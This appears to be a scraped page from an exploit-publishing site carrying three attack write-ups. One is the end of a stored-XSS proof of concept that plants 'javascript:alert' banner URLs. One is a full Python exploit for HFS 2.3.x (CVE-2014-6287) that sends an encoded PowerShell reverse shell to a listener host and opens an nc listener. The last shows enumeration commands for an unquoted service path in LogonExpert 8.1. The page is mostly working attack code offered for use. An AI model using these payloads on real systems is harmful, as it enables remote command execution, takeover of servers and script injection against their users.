Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 479 Origin: redacted Connection: close[snipped] func=ll&objAction=ConfigLookFeel&objId=1120281&currenttab=2&tab=1&roleid=0&newroleid=0&IMG1_ID=1129727&IMG1_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_ALT=THISBANNERWILLEXECUTEJAVASCRIPT&IMG1_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29&IMG2_ID=1129727&IMG2_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_ALT=THISONETOO&IMG2_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29 ------------------------------------------------------------------------------------------ Next a user would have to browse to the project page and click on the project banner. ==========================================================================================
HireHackking

HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)

HACKER · %s · %s

# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) # Google Dork: intext:"httpfileserver 2.3" # Date: 20/02/2021 # Exploit Author: Pergyz # Vendor Homepage: http://www.rejetto.com/hfs/ # Software Link: https://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Microsoft Windows Server 2012 R2 Standard # CVE : CVE-2014-6287 # Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands #!/usr/bin/python3 import base64 import os import urllib.request import urllib.parse lhost = "10.10.10.1" lport = 1111 rhost = "10.10.10.8" rport = 80 # Define the command to be written to a file command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()' # Encode the command in base64 format encoded_command = base64.b64encode(command.encode("utf-16le")).decode() print("\nEncoded the command in base64 format...") # Define the payload to be included in the URL payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}' # Encode the payload and send a HTTP GET request encoded_payload = urllib.parse.quote_plus(payload) url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}' urllib.request.urlopen(url) print("\nEncoded the payload and sent a HTTP GET request to the target...") # Print some information print("\nPrinting some information for debugging...") print("lhost: ", lhost) print("lport: ", lport) print("rhost: ", rhost) print("rport: ", rport) print("payload: ", payload) # Listen for connections print("\nListening for connection...") os.system(f'nc -nlvp {lport}')
HireHackking

LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path # Discovery by: Victor Mondragón # Discovery Date: 23-02-2021 # Vendor Homepage: https://www.softros.com/ # Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi # Tested Version: 8.1 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 7 Service Pack 1 x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto C:\>sc qc LogonExpertSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: LogonExpertSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe LOAD_ORDER_GROUP : LogonExpertGroup TAG : 0 DISPLAY_NAME : LogonExpert Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem